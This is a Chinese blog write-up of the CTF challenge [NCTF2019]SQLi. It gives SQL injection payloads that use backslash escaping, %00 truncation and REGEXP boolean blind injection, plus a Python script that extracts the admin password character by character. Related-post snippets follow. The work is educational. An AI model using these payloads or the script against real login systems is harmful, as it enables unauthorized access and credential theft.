[NCTF2019]SQLi 1&regexp注入

于 2022-10-03 13:09:50 发布
阅读量1.3k 收藏 1
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/127151226
版权

[NCTF2019]SQLi&regexp注入

知识点:

  • 无引号闭合,可以利用转义符 \
  • %00作为截断字符可以代替注释符#和-- -
  • regexp注入可以配合 ^ 来爆破字符

  • 解题:

    打开题目得到:

    在这里插入图片描述
    可以看做插入语句:

    select * from users where username='' and passwd=''

    在robots.txt页面发现:

    在这里插入图片描述

    访问hint.txt页面:

    在这里插入图片描述
    发现没有过滤 " 和 \

    并且当密码和admin密码相同时就能得到flag

    所有构造playload:

    username=&passwd=||1;%00

    测试:
    在这里插入图片描述
    username=&passwd=||0;%00

    在这里插入图片描述
    发现为ture时返回Location: welcome.php
    可以利用bool盲注进行注入,爆破passwd

    playload:

    username=\&passwd=||passwd/**/regexp/**/"^y";%00

    在这里插入图片描述

    利用python脚本爆破密码:

    import requests
from urllib import parse
import string
import time

url='http://ace11359-ed0b-4d9e-916a-74179b3d4dc2.node4.buuoj.cn:81/index.php'

string= string.ascii_lowercase + string.digits + '_'

flag=''

for i in range(100):
    for j in string:

        data={
            "passwd":"||/**/passwd/**/regexp/**/\"^{}\";{}".format((flag+j),parse.unquote('%00')),
            #'passwd':'||/*1*/passwd/*1*/regexp/*1*/"^{}";{}'.format(i,'%00'),
            'username':"\\"
        }
        #print(data)
        res = requests.post(url=url,data=data).text
        #print(res)
        if 'welcome' in res:
            flag+=j
            print(flag)
            #print(res)
            break
        time.sleep(0.1)
    time.sleep(0.1)

    随便输入一个用户,用admin的密码登陆得到flag

    参考博客:

    https://blog.csdn.net/weixin_45669205/article/details/116137824

南冥~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[NCTF2019]SQLi
qq_52671379的博客
04-17 684
[NCTF2019]SQLi
payload sql注入_REGEXP注入与LIKE注入学习笔记
weixin_39885690的博客
12-19 446
更多全球网络安全资讯尽在邑安全www.eansec.com0x00 前言之前已经学过SQL盲注了,也见过盲注中REGEXP注入,但没详细了解过。正好之前BJDCTF遇到了这个,简单总结一下REGEXP注入和LIKE注入,并进行题目复现。0x01 REGEXP注入分析注入原理REGEXP注入,即regexp正则表达式注入REGEXP注入,又叫盲注值正则表达式攻击。应用场景就是盲注,原理是...
盲注之正则表达式攻击(REGEXP注入
秋水的博客
09-03 3709
注入原理 什么是REGEXP注入? 首先说明一下,我并没发现这种注入是多么独特的一种方式。只是因为看到了,所以记下笔记,难受啊,越学看到的越多 REGEXP注入是一中注入方式,又叫盲注值正则表达式攻击 注入原理 应该场景就是盲注,原理就是直接查询自己需要的数据,然后通过正则表达式进行匹配,实用场景如下 and 1=(SELECT 1 FROM information_sche...
网络内生安全试验场-201909-SQL-wp
weixin_42444939的博客
09-19 325
fuzz发现几个重要过滤点 (包括 ’ , = , select , sleep 等) 以下为未过滤的sql注入关键词 那么现在来捋下思路,select被ban,意味着爆库名表名这条路走不通 考虑从爆password入手(当然,听学长说貌似也可以尝试堆叠,但我尝试后发现insert和sleep等被过滤,也就不再继续) 绕过细节: %20用/**/代替 substr和=的组合用regexp代替...
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
全国大学生电子设计大赛之历年.7z
09-19
1. **电路设计**:历年的大赛中,电路设计是基础且重要的环节,包括模拟电路、数字电路、电源电路等。参赛者需要掌握电路分析、设计与仿真工具,如Multisim或LTSpice,理解基本元器件的工作原理和应用。 2. **...
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
[NCTF2019]SQLi --BUUCTF --详解
金 帛的博客
06-13 1290
BUUCTF记录贴
BUUCTF:[NCTF2019]SQLi --sql正则注入 ---- regexp注入 --- sql 闭合的新的骚操作 --PHP版本的%00截断
Zero_Adam的博客
03-15 970
目录:一、自己做,二、学到的:三、学习WP:1.盲注, 这个讲正则注入原理比较细致,有mysql的本地实验 这个有一道例题 一、自己做, fuzzing了,但是没有思路, 给我这么一句话:try to make the sqlquery have its own results. 后来发现没用, 二、学到的: mysql正则注入 regex 一个新的sql闭合方式,妈呀,骚的很,至少对于我这个菜鸡才说是开了眼界了,,,牛你牛后面看看 sql注入时,当注释符和单引号都被过滤了的时候,我们不能够闭合语句了,
2019-NCTF web writeup(下)
crispr的博客
11-28 764
2019-NCTF web writeup(下) 前言 由于某些不可抗力因素 ,导致NCTF的平台已经关闭,还没开源,所以我只能盗用我队友的图来进行个人总结了qwq。不过知识点应该都还齐全2333。 收货 4.chr()拼接绕过 5.preg_replace()函数/e漏洞(PHP7.0失效了qwq) 6.flask的SSTI注入 2019NCTF题目(下) 0x05 repl...
[转载]sql 盲注之正则表达式攻击
weixin_34396902的博客
07-29 237
-----------------------------------------MYSQL 5+----------------------------------------- 我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息。故攻击方式如下: 1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli...
[NCTF2019]SQLi——%00截断的“呼唤”
Mrs_H的博客
11-01 785
前言 本来是想趁这个时间点把逆向的作业做一做的,哪想到我装有工具的虚拟机突然暴毙了。抱着个电脑没什么可以做的,没事闲的又做了道sql的题目,也算是弥补了昨天没做题目的遗憾。 正文 关于%00的截断原理是这样的: 0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。 但是这道题我们不是通过%00后面的内容去绕过文件格式的过滤,我们是要通过%00帮我们把最后的引号给屏蔽掉,这是我们的最终目的。 先来看题。 题目的作者让我们去构建
0 3 * * * sh /path/to/script.sh || sleep 600 && sh /path/to/script.sh可以改写成0 3 * * * sh /path/to/script.sh || sleep 600 ; sh /path/to/script.sh吗
07-15
是的,你可以将该crontab脚本改写成 `0 3 * * * sh /path/to/script.sh || sleep 600 ; sh /path/to/script.sh`,以实现在任务执行失败后延迟一段时间后再次执行。 在这个改写后的脚本中,`;` 用于表示无条件地执行后面的命令,无论前一个命令的执行结果如何。因此,即使第一个命令执行失败,也会延迟600秒后执行后续的命令 `sh /path/to/script.sh`。 请注意,这种改写只会进行一次重试。如果任务在第二次执行时仍然失败,将不会再进行进一步的重试。如果你需要多次重试,可以使用类似的逻辑来设置多个延迟和执行命令。 同时,请确保 `/path/to/script.sh` 是正确的脚本路径,并且具有可执行权限。另外,确保crontab配置文件中的其他部分正确配置,并考虑其他可能导致任务失败的因素,如环境变量、路径问题等。 通过这种改写方式,你可以在任务执行失败后延迟一段时间再次执行,以提高任务的可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值